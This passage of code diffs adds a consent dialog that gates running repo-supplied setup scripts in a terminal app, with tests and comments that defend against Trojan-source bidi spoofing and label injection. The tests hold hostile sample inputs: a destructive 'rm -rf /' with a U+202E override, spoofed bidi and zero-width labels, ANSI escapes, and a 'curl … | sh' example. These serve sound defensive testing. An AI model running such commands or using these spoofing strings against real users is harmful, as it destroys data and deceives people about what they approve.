+          // The presence-name attack, aimed at a trust dialog instead: U+202E reverses everything
+          // after it, so this location DISPLAYS as something other than what it inspects as. Same
+          // class, same reasoning as shared/presence.ts's UNSAFE_NAME_CHARS.
+          projectName: 'safe-repo\u202eevil',
+          locationLabel: '~/code/\u200bap\ufeffp'
+        })
+      )
+    )
+    const shown = text()
+    expect(shown).not.toContain('\u202e')
+    expect(shown).not.toContain('\u200b')
+    expect(shown).not.toContain('\ufeff')
+    // Every VISIBLE character survives — the strip removes only what has no glyph.
+    expect(shown).toContain('safe-repoevil')
+    expect(shown).toContain('~/code/app')
+  })
+
+  it('I2: pins the script boxes to byte order, so a Trojan-source U+202E cannot reorder what is approved', () => {
+    mount()
+    // The bytes are NOT altered — this is what will run, and it must be shown verbatim — so the
+    // defence is presentational: bidi-override forces the display order to the byte order.
+    const body = 'rm -rf /\u202e # elbmaerp'
+    act(() => emitRequest(request({ scripts: { setup: body } })))
+    const pre = scripts()[0]
+    expect(pre.textContent).toBe(body)
+    expect(pre.style.unicodeBidi).toBe('bidi-override')
+    expect(pre.style.direction).toBe('ltr')
+  })
+
   it('renders the script bodies VERBATIM — they are what the approval covers', () => {
     mount()
     act(() => emitRequest(request({ scripts: { setup: 'echo "<img src=x>"\nmake  install' } })))

--- a/src/renderer/components/SetupConsentDialog.test.tsx
+++ b/src/renderer/components/SetupConsentDialog.test.tsx
@@ -1,0 +1,277 @@
+// @vitest-environment jsdom
+//
+// THE trust gate for a git-shared setup/archive script: a cloned repo's `.nodeterm/settings.json`
+// can carry `setupScript: "curl … | sh"`, and this dialog is the only thing between it and a
+// spawn. Everything asserted here is security-shaped:
+//
+//  - it must show EVERYTHING the one approval covers (both family scripts), because main hashes
+//    the family together — approving after reading only half is approving code unseen,
+//  - only the two buttons are answers: Escape / an overlay misclick submit NOTHING (main's expiry
+//    owns the `undefined`), mirroring the capability clone notice's dismiss handling,
+//  - exactly ONE `consent` call per request, however many times the button is hit,
+//  - `projectName` / `locationLabel` cross the IPC boundary from a file the user did not write:
+//    they are rendered as TEXT ONLY and clamped (no control characters, length capped).
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import type { ProjectSetupConsentRequest } from '@shared/project-settings'
+import { CONFIRM_ARM_MS } from './confirm-key'
+import { SETUP_LABEL_MAX, SetupConsentDialog } from './SetupConsentDialog'
+
+;(globalThis as { IS_REACT_ACT_ENVIRONMENT?: boolean }).IS_REACT_ACT_ENVIRONMENT = true
+
+const request = (over: Partial<ProjectSetupConsentRequest> = {}): ProjectSetupConsentRequest => ({
+  requestId: 'req-1',
+  kind: 'setup',
+  projectName: 'cloned-repo',
+  locationLabel: '~/code/cloned-repo',
+  scripts: { setup: 'npm install', archive: 'rm -rf node_modules' },
+  previouslyApproved: false,
+  ...over
+})
+
+let root: Root
+let host: HTMLElement
+let consent: ReturnType<typeof vi.fn>
+let emitRequest: (req: ProjectSetupConsentRequest) => void
+let emitDismiss: (p: { requestId: string }) => void
+let offRequest: ReturnType<typeof vi.fn>
+let offDismiss: ReturnType<typeof vi.fn>
+
+function mount(): void {
+  root = createRoot(host)
+  act(() => root.render(<SetupConsentDialog />))
+}
+
+function dialog(): HTMLElement | null {
+  return document.querySelector('.confirm')
+}
+
+function text(): string {
+  return dialog()?.textContent ?? ''
+}
+
+function scripts(): HTMLElement[] {
+  return [...document.querySelectorAll<HTMLElement>('.confirm pre[data-script-kind]')]
+}
+
+function button(label: string): HTMLButtonElement {
+  const el = [...document.querySelectorAll<HTMLButtonElement>('.confirm button')].find(
+    (b) => b.textContent === label
+  )
+  expect(el, `button "${label}"`).toBeTruthy()
+  return el!
+}
+
+beforeEach(() => {
+  host = document.createElement('div')
+  document.body.appendChild(host)
+  consent = vi.fn(async () => {})
+  offRequest = vi.fn()
+  offDismiss = vi.fn()
+  ;(window as unknown as { nodeTerminal: unknown }).nodeTerminal = {
+    projectSetup: {
+      consent,
+      onConsentRequest: (cb: (r: ProjectSetupConsentRequest) => void) => {
+        emitRequest = cb
+        return offRequest
+      },
+      onConsentDismiss: (cb: (p: { requestId: string }) => void) => {
+        emitDismiss = cb
+        return offDismiss
+      }
+    }
+  }
+})
+
+afterEach(() => {
+  act(() => root.unmount())
+  host.remove()
+})
+
+describe('SetupConsentDialog', () => {
+  it('renders nothing until a request arrives', () => {
+    mount()
+    expect(dialog()).toBeNull()
+  })
+
+  it('names the project and its location, and shows BOTH family scripts with the running one first', () => {
+    mount()
+    act(() => emitRequest(request({ kind: 'archive' })))
+    expect(text()).toContain('cloned-repo')
+    expect(text()).toContain('~/code/cloned-repo')
+    const boxes = scripts()
+    expect(boxes).toHaveLength(2)
+    // One approval covers the whole family, so the dialog shows the whole family — the script
+    // about to run leads, but the other is right there and is equally approved.
+    expect(boxes[0].dataset.scriptKind).toBe('archive')
+    expect(boxes[0].textContent).toBe('rm -rf node_modules')
+    expect(boxes[1].dataset.scriptKind).toBe('setup')
+    expect(boxes[1].textContent).toBe('npm install')
+  })
+
+  it('omits a script the family does not set', () => {
+    mount()
+    act(() => emitRequest(request({ scripts: { setup: 'make bootstrap' } })))
+    const boxes = scripts()
+    expect(boxes).toHaveLength(1)
+    expect(boxes[0].dataset.scriptKind).toBe('setup')
+  })
+
+  it('says the scripts CHANGED when a previous approval exists', () => {
+    mount()
+    act(() => emitRequest(request({ previouslyApproved: true })))
+    expect(text().toLowerCase()).toContain('changed since you approved')
+  })
+
+  it('does not say that for a first-time approval', () => {
+    mount()
+    act(() => emitRequest(request()))
+    expect(text().toLowerCase()).not.toContain('changed since you approved')
+  })
+
+  it('"Run once" submits approve exactly once, however many clicks land', () => {
+    mount()
+    act(() => emitRequest(request()))
+    const btn = button('Run once')
+    act(() => {
+      btn.click()
+      btn.click()
+    })
+    expect(consent).toHaveBeenCalledTimes(1)
+    expect(consent).toHaveBeenCalledWith('req-1', 'approve')
+    expect(dialog()).toBeNull()
+  })
+
+  it('"Skip" submits skip', () => {
+    mount()
+    act(() => emitRequest(request()))
+    act(() => button('Skip').click())
+    expect(consent).toHaveBeenCalledWith('req-1', 'skip')
+    expect(dialog()).toBeNull()
+  })
+
+  it('Escape submits NOTHING — it closes the dialog and leaves the answer to main’s expiry', () => {
+    mount()
+    act(() => emitRequest(request()))
+    act(() => {
+      window.dispatchEvent(new KeyboardEvent('keydown', { key: 'Escape' }))
+    })
+    expect(dialog()).toBeNull()
+    expect(consent).not.toHaveBeenCalled()
+  })
+
+  it('an overlay misclick submits NOTHING either', () => {
+    mount()
+    act(() => emitRequest(request()))
+    act(() => {
+      document.querySelector<HTMLElement>('.confirm-overlay')!.click()
+    })
+    expect(dialog()).toBeNull()
+    expect(consent).not.toHaveBeenCalled()
+  })
+
+  it('is CLICK-ONLY: Enter aimed into the dialog approves nothing', async () => {
+    mount()
+    act(() => emitRequest(request()))
+    // Outwait the arm window first: a fresh dialog ignores Enter for CONFIRM_ARM_MS regardless of
+    // `enterConfirms`, so an immediate dispatch would pass even with the prop dropped.
+    await new Promise((r) => setTimeout(r, CONFIRM_ARM_MS + 150))
+    act(() => {
+      dialog()!.dispatchEvent(new KeyboardEvent('keydown', { key: 'Enter', bubbles: true }))
+      window.dispatchEvent(new KeyboardEvent('keydown', { key: 'Enter' }))
+    })
+    expect(dialog()).toBeTruthy()
+    expect(consent).not.toHaveBeenCalled()
+  })
+
+  it('holds focus on NO button, so a native Enter/Space mid-typing cannot approve it', () => {
+    const typing = document.createElement('input')
+    document.body.appendChild(typing)
+    typing.focus()
+    mount()
+    act(() => emitRequest(request()))
+    expect(document.activeElement).toBe(typing)
+    for (const b of document.querySelectorAll('.confirm button')) {
+      expect(document.activeElement).not.toBe(b)
+    }
+    typing.remove()
+  })
+
+  it('the dismiss broadcast drops the local prompt without answering it', () => {
+    mount()
+    act(() => emitRequest(request()))
+    act(() => emitDismiss({ requestId: 'req-1' }))
+    expect(dialog()).toBeNull()
+    expect(consent).not.toHaveBeenCalled()
+  })
+
+  it('a dismiss for some OTHER request leaves this one standing', () => {
+    mount()
+    act(() => emitRequest(request()))
+    act(() => emitDismiss({ requestId: 'req-elsewhere' }))
+    expect(dialog()).toBeTruthy()
+  })
+
+  it('queues a second request and shows it once the first is answered', () => {
+    mount()
+    act(() => emitRequest(request()))
+    act(() => emitRequest(request({ requestId: 'req-2', projectName: 'other-repo' })))
+    expect(text()).toContain('cloned-repo')
+    act(() => button('Skip').click())
+    expect(dialog()).toBeTruthy()
+    expect(text()).toContain('other-repo')
+    act(() => button('Run once').click())
+    expect(consent).toHaveBeenNthCalledWith(1, 'req-1', 'skip')
+    expect(consent).toHaveBeenNthCalledWith(2, 'req-2', 'approve')
+  })
+
+  it('a repeated request id does not stack two prompts for the same question', () => {
+    mount()
+    act(() => emitRequest(request()))
+    act(() => emitRequest(request()))
+    act(() => button('Skip').click())
+    expect(dialog()).toBeNull()
+  })
+
+  it('CLAMPS the project name and location: control characters stripped, length capped', () => {
+    mount()
+    act(() =>
+      emitRequest(
+        request({
+          // Cross-boundary strings out of a file a stranger may have written. The escapes are
+          // written as \u sequences on purpose: a raw control byte in a source file is invisible
+          // to git and ripgrep, which has already cost this repo a day.
+          projectName: 'evil\u001b[31mred\r\nSecond line',
+          locationLabel: '/srv/' + 'a'.repeat(400)
+        })
+      )
+    )
+    const shown = text()
+    // eslint-disable-next-line no-control-regex
+    expect(/[\u0000-\u001f\u007f-\u009f]/.test(shown)).toBe(false)
+    expect(shown).toContain('evil')
+    expect(shown).toContain('Second line')
+    // Capped with an ellipsis rather than allowed to run the dialog off the screen.
+    expect(shown).not.toContain('a'.repeat(SETUP_LABEL_MAX + 1))
+    expect(shown).toContain('\u2026')
+  })
+
+  it('renders the script bodies VERBATIM — they are what the approval covers', () => {
+    mount()
+    act(() => emitRequest(request({ scripts: { setup: 'echo "<img src=x>"\nmake  install' } })))
+    // Text, never markup: a `<pre>` child is escaped by React, and the user must see every byte
+    // they are approving — clamping a script would mean approving what is not on screen.
+    expect(scripts()[0].textContent).toBe('echo "<img src=x>"\nmake  install')
+    expect(scripts()[0].querySelector('img')).toBeNull()
+  })
+
+  it('unsubscribes both channels on unmount', () => {
+    mount()
+    act(() => root.unmount())
+    expect(offRequest).toHaveBeenCalledTimes(1)
+    expect(offDismiss).toHaveBeenCalledTimes(1)
+    // The afterEach unmount must stay harmless.
+    root = createRoot(host)
+  })
+})

--- a/src/renderer/components/SetupConsentDialog.tsx
+++ b/src/renderer/components/SetupConsentDialog.tsx
@@ -29,11 +29,16 @@ import { ConfirmDialog } from './ConfirmDialog'
  * that a stranger may have written (a cloned repo, a teammate's commit). The rule here is TEXT
  * ONLY: they are rendered as React text children (never interpolated into markup, a template that
  * gets parsed, a `title`/`href`, or anything handed to a terminal) and they are clamped by
- * `safeLabel` first — control characters stripped and the length capped — so neither an ANSI
- * escape run nor a 50 KB name can rewrite or overflow the dialog that is asking the question. The
- * SCRIPT BODIES are deliberately NOT clamped: they are the thing being approved, and truncating
- * them would mean the user approves bytes that were never on screen. They are rendered as text in
- * a scrollable `<pre>`, which is inert.
+ * `safeLabel` first — control characters, bidi overrides and zero-width marks stripped, then the
+ * length capped — so neither an ANSI escape run, a U+202E that reverses the location, nor a 50 KB
+ * name can rewrite or overflow the dialog that is asking the question.
+ *
+ * The SCRIPT BODIES are deliberately NOT clamped: they are the thing being approved, and stripping
+ * or truncating them would mean the user approves bytes that were never on screen. They are
+ * rendered as text in a scrollable `<pre>`, which is inert — and that `<pre>` carries
+ * `unicode-bidi: bidi-override; direction: ltr`, which defeats Trojan-source reordering (a U+202E
+ * inside a script making a comment read as executable code, or vice versa) by pinning the DISPLAY
+ * order to the byte order, WITHOUT altering a single byte of what is approved and run.
  *
  * KNOWN GAP (documented here, not fixable from this side — final-wave decision): a relay guest can
  * currently dispatch `project-setup:run` AND `project-setup:consent-submit` on the host
@@ -47,10 +52,22 @@ import { ConfirmDialog } from './ConfirmDialog'
 /** Longest a name/location may be on screen, in characters. */
 export const SETUP_LABEL_MAX = 200
 
-/** Clamp for a cross-boundary label: control characters out (see `oneLine` — a name is one line of
- *  text and no control character has a glyph), then capped with an ellipsis. */
+/**
+ * Characters a cross-boundary LABEL may never contain — the same class, for the same reason, that
+ * `capName` strips from a presence display name (`src/shared/presence.ts`, `UNSAFE_NAME_CHARS`,
+ * where the rationale is written out): a bidi override (U+202E) reverses everything after it, so
+ * "app" + U+202E + "hs.live-nur" DISPLAYS as a different location than the one that inspects out
+ * of the file, and the zero-width marks/isolates (U+200B-200F, U+2066-2069, U+FEFF) do the same
+ * job invisibly. Replicated rather than imported because that constant is private to the presence
+ * module and its cap (`capName`) is a different one; keep the two in step.
+ */
+const UNSAFE_LABEL_CHARS = /[\u200b-\u200f\u202a-\u202e\u2066-\u2069\ufeff]/g
+
+/** Clamp for a cross-boundary label: control characters out (see `oneLine` — a label is one line of
+ *  text and no control character has a glyph), then the bidi/zero-width spoofing set out, then
+ *  capped with an ellipsis. */
 function safeLabel(raw: string): string {
-  const flat = oneLine(raw)
+  const flat = oneLine(raw.replace(UNSAFE_LABEL_CHARS, '')).trim()
   return flat.length > SETUP_LABEL_MAX ? flat.slice(0, SETUP_LABEL_MAX - 1) + '…' : flat
 }
 
@@ -127,8 +144,12 @@ export function SetupConsentDialog(): React.JSX.Element | null {
               <p className="text-[12px] font-semibold text-text">
                 {KIND_LABEL[s.kind]} script{s.kind === head.kind ? ' (about to run)' : ''}
               </p>
-              {/* Text child, never markup — and never truncated: this is what is being approved. */}
+              {/* Text child, never markup — and never truncated: this is what is being approved.
+                  `bidi-override`/`ltr` pins the DISPLAY order to the byte order, so a U+202E in the
+                  script cannot make the reader see a different program than the one that will run
+                  (Trojan source). It changes nothing about the bytes themselves. */}
               <pre
+                style={{ unicodeBidi: 'bidi-override', direction: 'ltr' }}
                 data-script-kind={s.kind}
                 className={`max-h-40 overflow-auto whitespace-pre-wrap break-words rounded-md border px-2.5 py-2 font-mono text-[12px] leading-relaxed text-text ${
                   s.kind === head.kind ? 'border-accent bg-bg' : 'border-border bg-bg opacity-80'

--- a/src/renderer/components/SetupConsentDialog.tsx
+++ b/src/renderer/components/SetupConsentDialog.tsx
@@ -40,13 +40,15 @@ import { ConfirmDialog } from './ConfirmDialog'
  * inside a script making a comment read as executable code, or vice versa) by pinning the DISPLAY
  * order to the byte order, WITHOUT altering a single byte of what is approved and run.
  *
- * KNOWN GAP (documented here, not fixable from this side — final-wave decision): a relay guest can
- * currently dispatch `project-setup:run` AND `project-setup:consent-submit` on the host
- * (`src/main/platform-electron.ts` — `dispatch` forbids only `githubControl:` methods), so a guest
- * could trigger a prompt and then answer it themselves without the host's user touching anything.
- * That is a main-side ADMISSION question — which methods a non-host peer may call — and no dialog
- * property can close it: this component cannot tell whose IPC message reached main. It is recorded
- * for the final wave's admission decision.
+ * WHO MAY ANSWER (closed in the final wave, main-side — nothing here could have closed it): a
+ * relay guest could otherwise dispatch `project-setup:run` and then cast
+ * `project-setup:consent-submit`, triggering a prompt and approving it itself with the host's user
+ * never touching anything. Both channels are now HOST-ONLY at the admission seam
+ * (`src/shared/host-control.ts`, enforced in `dispatch` AND `cast` in
+ * `src/main/platform-electron.ts`), and the prompt itself is delivered to the host's main window
+ * only (`ProjectSetupService`'s `sendConsent`) instead of the peer-fanning broadcast — so the
+ * script bytes rendered below are never disclosed to a guest either. This component still cannot
+ * tell whose message reached main; it does not have to.
  */
 
 /** Longest a name/location may be on screen, in characters. */

--- a/src/renderer/components/SetupConsentDialog.tsx
+++ b/src/renderer/components/SetupConsentDialog.tsx
@@ -1,0 +1,159 @@
+import { useEffect, useRef, useState } from 'react'
+import type {
+  ProjectSetupConsentAnswer,
+  ProjectSetupConsentRequest,
+  ProjectSetupKind
+} from '@shared/project-settings'
+import { oneLine } from '@shared/one-line'
+import { ConfirmDialog } from './ConfirmDialog'
+
+/**
+ * THE TRUST GATE for a git-shared setup/archive script — the last thing between a cloned repo's
+ * `.nodeterm/settings.json` and a spawn on this machine. Its properties are security-shaped, in
+ * the same family as `CapabilityNotice` (the clone-arrived capability switch):
+ *
+ *  - IT SHOWS EVERYTHING THE ANSWER COVERS. One approval pins the whole `setup` family's hash
+ *    (`projectTrustContent`), so the payload carries BOTH scripts and both are rendered. Showing
+ *    only the one about to run would be approving the other unseen — the next archive would then
+ *    execute code the user never read, under an approval they gave for something else.
+ *  - ONLY THE TWO BUTTONS ARE ANSWERS. `enterConfirms={false}` shuts the window-keydown path and
+ *    `autoFocusButtons={false}` means no button holds focus for a native Enter/Space — this dialog
+ *    appears under the user's hands (a worktree they just created starts a setup run), and a
+ *    keystroke aimed at a terminal must never approve a script. Escape and an overlay misclick
+ *    submit NOTHING: they hide the prompt locally and leave the decision to main's expiry, which
+ *    resolves an unanswered request as `undefined` (= not approved, nothing runs).
+ *  - EXACTLY ONE SUBMISSION PER REQUEST, guarded by `answeredRef` — a double click must not send a
+ *    second answer that a re-used requestId could apply to a different question.
+ *
+ * SECURITY — CROSS-BOUNDARY STRINGS: `projectName` and `locationLabel` come from a project file
+ * that a stranger may have written (a cloned repo, a teammate's commit). The rule here is TEXT
+ * ONLY: they are rendered as React text children (never interpolated into markup, a template that
+ * gets parsed, a `title`/`href`, or anything handed to a terminal) and they are clamped by
+ * `safeLabel` first — control characters stripped and the length capped — so neither an ANSI
+ * escape run nor a 50 KB name can rewrite or overflow the dialog that is asking the question. The
+ * SCRIPT BODIES are deliberately NOT clamped: they are the thing being approved, and truncating
+ * them would mean the user approves bytes that were never on screen. They are rendered as text in
+ * a scrollable `<pre>`, which is inert.
+ *
+ * KNOWN GAP (documented here, not fixable from this side — final-wave decision): a relay guest can
+ * currently dispatch `project-setup:run` AND `project-setup:consent-submit` on the host
+ * (`src/main/platform-electron.ts` — `dispatch` forbids only `githubControl:` methods), so a guest
+ * could trigger a prompt and then answer it themselves without the host's user touching anything.
+ * That is a main-side ADMISSION question — which methods a non-host peer may call — and no dialog
+ * property can close it: this component cannot tell whose IPC message reached main. It is recorded
+ * for the final wave's admission decision.
+ */
+
+/** Longest a name/location may be on screen, in characters. */
+export const SETUP_LABEL_MAX = 200
+
+/** Clamp for a cross-boundary label: control characters out (see `oneLine` — a name is one line of
+ *  text and no control character has a glyph), then capped with an ellipsis. */
+function safeLabel(raw: string): string {
+  const flat = oneLine(raw)
+  return flat.length > SETUP_LABEL_MAX ? flat.slice(0, SETUP_LABEL_MAX - 1) + '…' : flat
+}
+
+const KIND_LABEL: Record<ProjectSetupKind, string> = { setup: 'Setup', archive: 'Archive' }
+
+/** The family's scripts, the one about to run FIRST, skipping the ones the family does not set. */
+function orderedScripts(req: ProjectSetupConsentRequest): { kind: ProjectSetupKind; body: string }[] {
+  const order: ProjectSetupKind[] = req.kind === 'archive' ? ['archive', 'setup'] : ['setup', 'archive']
+  return order
+    .map((kind) => ({ kind, body: req.scripts[kind] }))
+    .filter((s): s is { kind: ProjectSetupKind; body: string } => s.body !== undefined)
+}
+
+export function SetupConsentDialog(): React.JSX.Element | null {
+  // A QUEUE, not a single request: two projects (or a run and a worktree archive) can ask at once,
+  // and answering one must not lose the other. The head is the one on screen.
+  const [queue, setQueue] = useState<ProjectSetupConsentRequest[]>([])
+  // Request ids already answered from here. Belt-and-braces against a double click landing before
+  // the re-render drops the head — main treats an unknown/stale id as a no-op, but a second answer
+  // must never leave this component in the first place.
+  const answeredRef = useRef<Set<string>>(new Set())
+
+  useEffect(() => {
+    const api = window.nodeTerminal.projectSetup
+    const offRequest = api.onConsentRequest((req) => {
+      setQueue((q) => (q.some((r) => r.requestId === req.requestId) ? q : [...q, req]))
+    })
+    // main answered (or expired) this one itself — drop it, silently and without submitting.
+    const offDismiss = api.onConsentDismiss(({ requestId }) => {
+      setQueue((q) => q.filter((r) => r.requestId !== requestId))
+    })
+    return () => {
+      offRequest()
+      offDismiss()
+    }
+  }, [])
+
+  const head = queue[0]
+  if (!head) return null
+
+  const drop = (requestId: string): void =>
+    setQueue((q) => q.filter((r) => r.requestId !== requestId))
+
+  const answer = (a: ProjectSetupConsentAnswer): void => {
+    if (answeredRef.current.has(head.requestId)) return
+    answeredRef.current.add(head.requestId)
+    void window.nodeTerminal.projectSetup.consent(head.requestId, a)
+    drop(head.requestId)
+  }
+
+  const name = safeLabel(head.projectName)
+  const location = safeLabel(head.locationLabel)
+
+  return (
+    <ConfirmDialog
+      // Keyed per request: the next prompt in the queue must be a FRESH dialog — its own
+      // arm-window (CONFIRM_ARM_MS) and its own stack id, never one that inherited the timer of
+      // the prompt the user just answered.
+      key={head.requestId}
+      body={
+        <div className="confirm__msg space-y-2">
+          <p className="text-[13px] text-muted">{location}</p>
+          {head.previouslyApproved ? (
+            <p className="text-[13px] text-[color:var(--warn)]">
+              These scripts have changed since you approved them for this project.
+            </p>
+          ) : null}
+          <p className="text-[13px] text-muted">
+            They come from the project&apos;s shared <code>.nodeterm/settings.json</code>, so anyone
+            who can commit to the repo can change them. One answer covers both.
+          </p>
+          {orderedScripts(head).map((s) => (
+            <div key={s.kind} className="space-y-1">
+              <p className="text-[12px] font-semibold text-text">
+                {KIND_LABEL[s.kind]} script{s.kind === head.kind ? ' (about to run)' : ''}
+              </p>
+              {/* Text child, never markup — and never truncated: this is what is being approved. */}
+              <pre
+                data-script-kind={s.kind}
+                className={`max-h-40 overflow-auto whitespace-pre-wrap break-words rounded-md border px-2.5 py-2 font-mono text-[12px] leading-relaxed text-text ${
+                  s.kind === head.kind ? 'border-accent bg-bg' : 'border-border bg-bg opacity-80'
+                }`}
+              >
+                {s.body}
+              </pre>
+            </div>
+          ))}
+        </div>
+      }
+      message={`Run the ${KIND_LABEL[head.kind].toLowerCase()} script for "${name}"?`}
+      confirmLabel="Run once"
+      cancelLabel="Skip"
+      // "Run once" is the grant, so it carries the danger styling; no button takes focus.
+      danger
+      enterConfirms={false}
+      autoFocusButtons={false}
+      onConfirm={() => answer('approve')}
+      onCancel={() => answer('skip')}
+      onDismiss={() => {
+        // NOT an answer. Nothing is submitted: main's pending request expires on its own and
+        // resolves as unanswered, which runs nothing. Only the local prompt goes away.
+        drop(head.requestId)
+      }}
+    />
+  )
+}

--- a/src/renderer/components/settings/ProjectSettingsFamilies.tsx
+++ b/src/renderer/components/settings/ProjectSettingsFamilies.tsx
@@ -413,13 +413,16 @@ function SetupRunControls({
   canRun: boolean
   hasScript: Record<ProjectSetupKind, boolean>
 }): React.JSX.Element {
-  const run = useProjectSetup((s) => s.byProject[projectId])
+  // Resolved through the ATTACHMENT this component made at ack time, not through "whatever event
+  // arrived on the channel we subscribed to": events carry no lane discriminator, so a worktree's
+  // run and this panel's run are told apart only by who claimed which runKey.
+  const attached = useProjectSetup((s) => s.runForProject(projectId))
   const [busy, setBusy] = useState<'' | ProjectSetupKind | 'cancel'>('')
   const [notice, setNotice] = useState('')
-  /** The runKey main acknowledged, held until the store reports that run reaching a terminal
-   *  state. Without it the buttons flicker back to enabled in the window between the ack and the
-   *  first event — and that window contains the consent dialog, which can be minutes long. */
-  const [startedKey, setStartedKey] = useState<string | null>(null)
+  /** The run main acknowledged, held until the store reports THAT run (by `runId`). `runKey` alone
+   *  will not do: it is deterministic, so the entry sitting under it may still be the PREVIOUS run
+   *  of the same script — showing its exit badge over a script that is starting right now. */
+  const [started, setStarted] = useState<{ runKey: string; runId: string } | null>(null)
   const unsubRef = useRef<(() => void) | null>(null)
   useEffect(
     () => () => {
@@ -429,9 +432,12 @@ function SetupRunControls({
     []
   )
 
-  const awaitingStarted = startedKey !== null && (!run || run.runKey !== startedKey)
+  // The acked run's first event has not landed yet, so what sits in the lane (if anything) is the
+  // PREVIOUS run of the same script. It is not ours to show.
+  const awaitingStarted = started !== null && attached?.runId !== started.runId
+  const run = awaitingStarted ? undefined : attached
   const active = busy !== '' || run?.state === 'running' || awaitingStarted
-  const liveKey = run?.state === 'running' ? run.runKey : awaitingStarted ? startedKey : null
+  const liveKey = run?.state === 'running' ? run.runKey : awaitingStarted ? started.runKey : null
 
   const start = async (kind: ProjectSetupKind): Promise<void> => {
     setNotice('')
@@ -440,8 +446,14 @@ function SetupRunControls({
     if (!unsubRef.current) unsubRef.current = useProjectSetup.getState().subscribeProject(projectId)
     try {
       const res = await window.nodeTerminal.projectSetup.run(projectId, kind, undefined)
-      if (res.status === 'skipped') setNotice(SKIP_NOTE[res.reason])
-      else setStartedKey(res.runKey)
+      if (res.status === 'skipped') {
+        setNotice(SKIP_NOTE[res.reason])
+        return
+      }
+      // Claim the lane with the runKey main gave us — this is what makes the events ours rather
+      // than some other initiator's, and it is why `attachProject` takes the ACKED key.
+      useProjectSetup.getState().attachProject(projectId, res.runKey)
+      setStarted({ runKey: res.runKey, runId: res.runId })
     } catch {
       setNotice('Could not start the script — the project may have become unavailable.')
     } finally {
@@ -458,7 +470,9 @@ function SetupRunControls({
          the truth about whether it ended. */
     } finally {
       setBusy('')
-      setStartedKey(null)
+      // Stop waiting for an acked run we just asked to die: from here the event stream (a
+      // `cancelled`, or a terminal event that beat the cancel) owns what the box shows.
+      setStarted(null)
     }
   }
 

--- a/src/renderer/components/settings/ProjectSettingsFamilies.tsx
+++ b/src/renderer/components/settings/ProjectSettingsFamilies.tsx
@@ -1,13 +1,17 @@
-import { useEffect, useState } from 'react'
+import { useEffect, useRef, useState } from 'react'
 import type {
   ProjectLocalSettings,
   ProjectSettingsDoc,
   ProjectSettingsFamily,
   ProjectSettingsSnapshot,
+  ProjectSetupKind,
+  ProjectSetupRunResult,
   ResolvedProjectSettings
 } from '@shared/project-settings'
+import { Button } from '@renderer/ui/Button'
 import { Input } from '@renderer/ui/Input'
 import { Switch } from '@renderer/ui/Switch'
+import { useProjectSetup } from '../../state/projectSetup'
 import { useSettingsSearch } from './context'
 import { FieldRow } from './FieldRow'
 import { formatEnvLines, formatListLines, parseEnvLines, parseListLines } from './project-settings-env'
@@ -362,6 +366,146 @@ const SAVE_FAILED_NOTE: Record<'shared' | 'local', string> = {
   local: 'Could not save this override on this machine; reload the project settings.'
 }
 
+/** Why a run the service refused never happened. A refusal must read as a refusal: the button was
+ *  pressed and nothing appeared, which is otherwise indistinguishable from a broken button. */
+const SKIP_NOTE: Record<Extract<ProjectSetupRunResult, { status: 'skipped' }>['reason'], string> = {
+  'no-script': 'Skipped: no script is set for this project.',
+  declined: 'Skipped: the trust prompt was answered "Skip", so nothing ran.',
+  unanswered: 'Skipped: the trust prompt went unanswered, so nothing ran.',
+  busy: 'Skipped: a run for this project is already in progress.',
+  unavailable: 'Skipped: this project has nowhere to run — no folder and no server connection.'
+}
+
+const RUN_LABEL: Record<ProjectSetupKind, string> = { setup: 'Run setup', archive: 'Run archive' }
+
+/** How a finished run reads in the badge. */
+function exitNote(state: 'done' | 'failed' | 'cancelled', exitCode: number | undefined): string {
+  if (state === 'cancelled') return 'Cancelled'
+  if (state === 'done') return `Finished (exit ${exitCode ?? 0})`
+  return `Failed (exit ${exitCode ?? 'unknown'})`
+}
+
+/**
+ * Manual "Run setup" / "Run archive" for this project, with the live output of whatever is running.
+ *
+ * The service — not this component — decides whether a script may run: a shared-sourced script goes
+ * through the consent dialog (`SetupConsentDialog`), and every refusal comes back as a `skipped`
+ * reason that is shown verbatim-ish below. So the properties that matter here are:
+ *
+ *  - SUBSCRIBE BEFORE RUN. Main can emit the first chunks before the `run` invoke resolves, so a
+ *    subscription opened on the ack would silently lose the head of the output (Task 1 review, T1).
+ *    The subscription is opened on the first click and held until the pane unmounts — a late
+ *    `cancelled`/`failed` event after a terminal-looking one must still land.
+ *  - HONEST DISABLED STATE. Disabled while a run is live (main would answer `busy` anyway), while
+ *    the family sets no EFFECTIVE script for that kind (local-over-shared — a machine-local script
+ *    is a real script), and for a project with nowhere to run (no folder, no server): the service
+ *    refuses that with `unavailable`, and offering a button that can only fail is a lie.
+ *  - The run is PROJECT-scoped: `worktreePath` is deliberately `undefined` here. Worktree-bound
+ *    runs come from the worktree flow (Task 5), which owns the path main then validates.
+ */
+function SetupRunControls({
+  projectId,
+  canRun,
+  hasScript
+}: {
+  projectId: string
+  /** False when the project has neither a folder nor an SSH endpoint. */
+  canRun: boolean
+  hasScript: Record<ProjectSetupKind, boolean>
+}): React.JSX.Element {
+  const run = useProjectSetup((s) => s.byProject[projectId])
+  const [busy, setBusy] = useState<'' | ProjectSetupKind | 'cancel'>('')
+  const [notice, setNotice] = useState('')
+  /** The runKey main acknowledged, held until the store reports that run reaching a terminal
+   *  state. Without it the buttons flicker back to enabled in the window between the ack and the
+   *  first event — and that window contains the consent dialog, which can be minutes long. */
+  const [startedKey, setStartedKey] = useState<string | null>(null)
+  const unsubRef = useRef<(() => void) | null>(null)
+  useEffect(
+    () => () => {
+      unsubRef.current?.()
+      unsubRef.current = null
+    },
+    []
+  )
+
+  const awaitingStarted = startedKey !== null && (!run || run.runKey !== startedKey)
+  const active = busy !== '' || run?.state === 'running' || awaitingStarted
+  const liveKey = run?.state === 'running' ? run.runKey : awaitingStarted ? startedKey : null
+
+  const start = async (kind: ProjectSetupKind): Promise<void> => {
+    setNotice('')
+    setBusy(kind)
+    // Before the call, never after — see the T1 note above.
+    if (!unsubRef.current) unsubRef.current = useProjectSetup.getState().subscribeProject(projectId)
+    try {
+      const res = await window.nodeTerminal.projectSetup.run(projectId, kind, undefined)
+      if (res.status === 'skipped') setNotice(SKIP_NOTE[res.reason])
+      else setStartedKey(res.runKey)
+    } catch {
+      setNotice('Could not start the script — the project may have become unavailable.')
+    } finally {
+      setBusy('')
+    }
+  }
+
+  const stop = async (runKey: string): Promise<void> => {
+    setBusy('cancel')
+    try {
+      await window.nodeTerminal.projectSetup.cancel(runKey)
+    } catch {
